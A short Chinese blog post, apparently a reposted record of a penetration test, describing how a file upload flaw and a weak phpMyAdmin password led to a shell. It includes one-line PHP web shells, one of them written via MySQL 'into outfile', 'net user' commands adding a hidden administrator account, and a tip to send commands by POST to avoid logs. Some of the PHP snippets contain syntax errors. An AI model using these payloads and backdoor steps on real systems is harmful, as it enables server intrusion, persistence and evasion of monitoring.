记录一次渗透测试全过程

一、信息收集:

  1、巡风扫漏洞看到一个80端口开放,上去看一看,任意文件上传。

  2、巡风扫漏洞还看到一个phpmyadmin弱口令,版本很老。

二、任意文件上传:

  1、上传php文件: 

<?php @system($_GET("cmd")) ?>
/*
    合理合法过程要接受检查,不然还是传post,默认不记日志
    上传路径在下载页面可以爆出来,直接访问可以解析
*/

  2、可以菜刀直接连了,或者我这里增加了一个账户

1 net user test test /add
2 net localgroup administrators test /add 
3 /*加入管理员,可以3389*/

  3、3389连上去:发现改机器被别人搞过:套路都一样。查日志post的,没操作。就能查到一个IP。根据网络安全监控设备日志查到归属人。

  4、另外一个弱口令登进去,mysql写一句话

1 select "<?php system("cmd") ?>" into outfile "/mainpath/test.php";

  5、菜刀连接。开启了安全模式,php很多函数执行不了。郁闷!

转载于:https://www.cnblogs.com/KevinGeorge/p/8059736.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值